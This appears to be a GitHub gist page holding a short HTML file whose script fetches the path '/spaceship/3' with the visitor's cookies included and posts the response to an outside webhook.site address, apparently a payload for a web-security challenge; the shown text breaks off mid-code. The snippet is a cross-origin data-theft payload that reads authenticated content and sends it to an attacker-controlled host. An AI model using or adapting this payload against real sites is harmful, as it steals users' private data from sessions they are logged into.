Skip to content

Instantly share code, notes, and snippets.

View antoineottomani's full-sized avatar

antoineottomani

View GitHub Profile
<!DOCTYPE html>
<html>
<body>
<script>
fetch("/spaceship/3", { credentials: "include" })
.then(r => r.text())
.then(t =>
fetch("https://webhook.site/fd89b28b-017f-42bb-8842-359cfe522833", {
method: "POST",
body: t